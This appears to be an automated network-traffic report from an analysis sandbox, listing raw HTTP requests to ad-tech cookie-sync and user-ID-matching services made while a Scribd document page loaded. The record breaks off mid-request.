Source: global trafficHTTP traffic detected: GET /r/dd/id/L2NzaWQvMS9jaWQvMTc0ODI0MTY1OC90LzA/url/https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Famo_match%3Fturn_id%3D%24!%7BTURN_UUID%7D%26id%3DAU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: d.turn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/UCookieSetPug?ird=1&rd=https%3A%2F%2Fids.ad.gt%2Fapi%2Fv1%2Fpbm_match%3Fpbm%3D%23PM_USER_ID%26id%3DAU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: image2.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /bounce HTTP/1.1Host: id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /lb/v1 HTTP/1.1Host: lb.eu-1-id5-sync.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=8gkxb6n&ttd_tpi=1&ttd_puid=AU1D-0100-001739863021-EHT1L4CA-5M76&gdpr=0 HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&adnxs_id=8561637051911725247&gdpr=0 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/g_hosted?id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /us?https://ids.ad.gt/api/v1/son_match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&uid=[UID]&gdpr=0 HTTP/1.1Host: sync.go.sonobi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /w/1.0/cm?gdpr=0&gdpr_consent=&id=476b50d3-5ccf-49a1-89b8-1ddf8ea18042&r=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26gdpr%3D0%26gdpr_consent%3D%26advId%3D98%26advUuid%3D HTTP/1.1Host: u.openx.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /pixel/p-1ZHFxK2kGG5Cz.gif?labels=publisher.27975.space.115858,adsize.400x272 HTTP/1.1Host: pixel.quantserve.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/js/user_sync.html?p=159196&userIdMacro=PM_UID&gdpr=0&gdpr_consent=&predirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D91%26advUuid%3DPM_UID%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: ads.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync-iframe?gdpr=0&gdpr_consent=&redirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D150%26advUuid%3D%7BpartnerId%7D%26gdpr%3D0%26gdpr_consent%3D HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/segments?url=https%253A%252F%252Fwww.scribd.com%252Fdocument%252F806838445%252FBank-Statement&partner_id=474&tagger_id=b9be9e1d9d5a9785a6417a9309e00232&au_id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: seg.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /websiteconfig?bt_env=prod&o=5714937848528896&w=scribd.com&l=EN HTTP/1.1Host: api.btmessage.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /sync?ssp=sekindo&gdpr=0&gdpr_consent= HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/amo_match?turn_id=2883371875300828767&id=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=6gvshk1&ttd_tpi=1&ttd_puid=67b433ed2421e&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /api/v1/openx?openx_id=9a3d7e45-fe92-4955-bc1d-9f0d63173aaa&id=AU1D-0100-001739863021-EHT1L4CA-5M76&auid=AU1D-0100-001739863021-EHT1L4CA-5M76 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /api/v1/son_match?id=AU1D-0100-001739863021-EHT1L4CA-5M76&uid=7ba61469-fd38-491b-a31e-2e21959f08cd&gdpr=0 HTTP/1.1Host: ids.ad.gtConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: au_id=AU1D-0100-001739863021-EHT1L4CA-5M76; au_3p_check=1
Source: global trafficHTTP traffic detected: GET /?pubid=11280&gdpr=0&gdpr_consent=&redirect=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D93%26advUuid%3D%7Bviewer_token%7D HTTP/1.1Host: csync.loopme.meConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /usermatchredir?s=191923&gdpr=0&gdpr_consent=&cb=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D99%26advUuid%3D HTTP/1.1Host: ssum-sec.casalemedia.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /openrtb/pbjs?s=1065814&v=8.1&ac=j&sd=1&nf=1&r=%7B%22id%22%3A%22164288365a8a6e%22%2C%22site%22%3A%7B%22page%22%3A%22https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement%22%7D%2C%22ext%22%3A%7B%22source%22%3A%22prebid%22%2C%22ixdiag%22%3A%7B%22mfu%22%3A0%2C%22bu%22%3A0%2C%22iu%22%3A1%2C%22nu%22%3A0%2C%22ou%22%3A0%2C%22allu%22%3A1%2C%22ren%22%3Afalse%2C%22version%22%3A%227.16.0%22%2C%22userIds%22%3A%5B%22pubProvidedId%22%5D%2C%22url%22%3A%22https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement%22%2C%22tmax%22%3A3000%2C%22syncsPerBidder%22%3A5%2C%22pbadslot%22%3A%22%2FPRM%2F115858%2Fwww_scribd_com%22%2C%22adunitcode%22%3A%22adUnit_1%22%7D%7D%2C%22imp%22%3A%5B%7B%22id%22%3A%2220e8c6aec0dff9%22%2C%22ext%22%3A%7B%22siteID%22%3A%221065814%22%2C%22tid%22%3A%2260b34a7d-900d-45c2-b5a1-33e470f85867%22%2C%22sid%22%3A%22300x169%22%2C%22fl%22%3A%22x%22%2C%22gpid%22%3A%22%2FPRM%2F115858%2Fwww_scribd_com%22%7D%2C%22video%22%3A%7B%22playerSize%22%3A%5B%5B300%2C169%5D%5D%2C%22mimes%22%3A%5B%22video%2Fmp4%22%2C%22application%2Fjavascript%22%2C%22video%2Fwebm%22%5D%2C%22minduration%22%3A1%2C%22maxduration%22%3A200%2C%22protocols%22%3A%5B1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C11%2C12%2C13%2C14%5D%2C%22linearity%22%3A1%2C%22api%22%3A%5B1%2C2%2C7%5D%2C%22placement%22%3A1%2C%22plcmt%22%3A2%2C%22startdelay%22%3A0%2C%22skip%22%3A1%2C%22playbackmethod%22%3A%5B6%5D%2C%22w%22%3A300%2C%22h%22%3A169%7D%2C%22bidfloor%22%3A2.7%2C%22bidfloorcur%22%3A%22USD%22%7D%5D%2C%22at%22%3A1%2C%22source%22%3A%7B%22ext%22%3A%7B%22schain%22%3A%7B%22ver%22%3A%221.0%22%2C%22complete%22%3A1%2C%22nodes%22%3A%5B%7B%22asi%22%3A%22freestar.com%22%2C%22sid%22%3A%221651%22%2C%22hp%22%3A1%7D%5D%7D%7D%7D%2C%22user%22%3A%7B%22eids%22%3A%5B%7B%22source%22%3A%22id5-sync.com%22%2C%22uids%22%3A%5B%7B%22id%22%3A%22ID5*R7fkB7XeO_2RmiPyJ2jLs9PMSNV9asnfuFIQzGXBAzn6ZdNgdq7r9JGgath5MWwB%22%2C%22ext%22%3A%7B%22linkType%22%3A1%7D%7D%5D%7D%2C%7B%22source%22%3A%22pubcid.org%22%2C%22uids%22%3A%5B%7B%22id%22%3A%229a9e0580-b86e-4be4-bde2-4fffcc767fe0%22%7D%5D%7D%5D%7D%7D HTTP/1.1Host: htlb.casalemedia.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /v/1.0/avjp?ju=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F806838445%2FBank-Statement&ch=UTF-8&res=1280x1024x24&ifr=true&tz=300&tws=1232x910&be=1&bc=hb_pb_3.0.3&dddid=47595e98-336a-411f-9864-0e5373a8da7e&nocache=1739863023418&id5id=ID5*R7fkB7XeO_2RmiPyJ2jLs9PMSNV9asnfuFIQzGXBAzn6ZdNgdq7r9JGgath5MWwB&pubcid=9a9e0580-b86e-4be4-bde2-4fffcc767fe0&schain=1.0%2C1!freestar.com%2C1651%2C1%2C%2C%2C&auid=561342919&vwd=300&vht=169&aucs=adUnit_9&aumfs=2700 HTTP/1.1Host: freestar-d.openx.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Content-Type: text/plainAccept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /track/cmf/generic?ttd_pid=tapad&ttd_tpi=1&ttd_puid=6ca034eb-2728-4fa9-b456-793a6491b4b3%252Chttps%25253A%25252F%25252Fids.ad.gt%25252Fapi%25252Fv1%25252Ftapad_match%25253Fid%25253DAU1D-0100-001739863021-EHT1L4CA-5M76%252526tapad_id%25253D6ca034eb-2728-4fa9-b456-793a6491b4b3%252C&gdpr=0&gdpr_consent= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /getuid?gdpr=0&gdpr_consent=&redir=https%3A%2F%2Flive.primis.tech%2Flive%2FliveCS.php%3Fsource%3Dexternal%26advId%3D121%26advUuid%3D%24UID HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: tluidp=1275989254868253457531
Source: global trafficHTTP traffic detected: GET /live/liveInternalSsp.php?sspData=%7B%22enc%22%3Atrue%2C%22comp%22%3Atrue%2C%22data%22%3A%22%5C%22rJmgW2gi2mvm%2FwXFaiMCFvTs8mFk6zmn3DZO2dJsCxdvoW50W4eK7qsij4gIlaHnJE2LaiPWMGlnHA45j5zHQ2e8ZeL3cg%2B%2Fculsojn7hijyCxolq3%2BGm5jVrlmVmnGhvci7r9gDMUwKcuAqGfFERb9bbShw0FTs6N%2F99isngI%2FDN5N9Q8JSYnbHybll1qbMEI13qGVqxYQrzdaupmQNRkM7o9V6pVqRJkzcFQiVsM1SWc5ybMycIRmqQDrmlanoBfNkEPUHQTTFjKo7vcoglAMmR5JVn9I%2FbKXgrozj9Cz9ZtxVquuTLW7F%2FxnLId6iRKyzbPXNl5inWlKnehufmphpNoxyKzio%2FcEVKXeYJbkl6yciNye11I7LyGnWkhP6tsKnyWYq8RzFAQTh9vVFflSJnLt3lQ2nGsvsxNjJnqfovLn7jvLYchPlazUZrqOsw%2BRY4s9YtpKTC3lbKQktqlEnkxNqiB0P%2Fkqsh1WV0Y80sf%2FAom4nTILBWLJ4%2F%2BsF8ZEnMMmYFnYRHgDxdcRqyCcRM4%2BvSQDWnfjFWRLOsBZi05Wy6YsDUTB0kcYRN%2FguGElvPad0oZ7lrcNuEIZw10vdnegW0OCZgd1zNQTfOBbI95bvmXkPWAgR1nb4k%2Fiz5vnbE87vNEuKGMj8LZNGWw2K03A8HUlHQ%2Fw7sI8UV72FIEK5uD%2BTuSt5irRo7AONZ5kqx%2BTheMkYpeqqxPdMgBCl0QTec1yZooMogbQFPKl83fJHCGPrTvroZzhJOV1S7uiddldeIvh3zK%2FKrZVWZf5GSFxkK4in9kmPTw7SM1LXB7nXqF3oaCSVUn5uJvfrZZnWOWFOyZhCGKboGgqMOOxVGo2Seghud2xCbDBYogF0UTY8pZ0Pm9kpl2cwfx3wWqN4Et8HA5e2u%2F1I9Vpx9FZpAypO0ko3Rag6c6d747B01KiivdQmQ7Ds7OYNrLt%2F%2Bf%2F5ZHz1N%2FyET7%2F0m3N2qirh%2F%2FqRiXN2iDw5fEPdYgaMD%2F%2B6P%2Fv0g3gswD%2BaJ6i0ajasrXrjIzI9Oi54Imz2czhB3%2BtCM%2Fq31bjVV253vhQhvsqIsYJ%2Bz0kVElpfDUbOiHdSRDgxu4oYPXikqEk7j5tOr3FK%2B73upeyMxfy4fdQO8wfmgyPBc44WODk9N8iKG9dNGVInN6iDYyalaIvgwvzNc8WjKBcNR1PwUx2pfXbgF9PfaZOqCRkFO%2FPK53W56J18pIZD8bdjVqFKefSrDtYTNWZoITuJewj4nHiNOs1aRdb3t31IMOeP8Tyh2mCTjo7uNFnBRa83VZXRcD8nT8phsKb4wVy6UgsVYZHS245OiJ7WRTs7c5S0fKhXeT4X8o6gNJl4egh2Y6BcQYaYnGdDLoR%2ByM0P%2B3zldwYweg%2B0tGg2mA47tEOtQyBrxGlihnP8pui8U%2BwF3%2FiAQNcG1kqJdi3YLP0YLkMUJXoWMOaW%2FzKSgufEna3eWcpVu4W1mF2Hzf6mfwQG0A%2Bjdrgke8%2Fc9WJNOIWYaM4R37RE%2FbAo7ybRLtePzaYp5aLDmenFjY4LKB9YhTSG0Xv040lBFzyVQd29ktVmpbhkOjkWb4CkBV1FmzHuRY0IRU%2B%2Fl4b2e8nKjJd%2Fy1aVBhQlHLXMnynfMbsgJF1xcRqiAQ0Q%2FPgWHT9dp2e3c4U7N5u4H9NooeECVf9LQOguUQgOvTKpjr6SZDVzb6jdWohq8pFRKiIvZYvMjLTqHt3WF5BlE5qJwnwTMFulSzgBrHs%2F9OSKkvNaYGfTGCcYoipGak0pIGq1IGvvmypPhByt3poOowvPa5lMTKY5lo0zgmLTjTAniuL8Kx5o4Hqa9H3j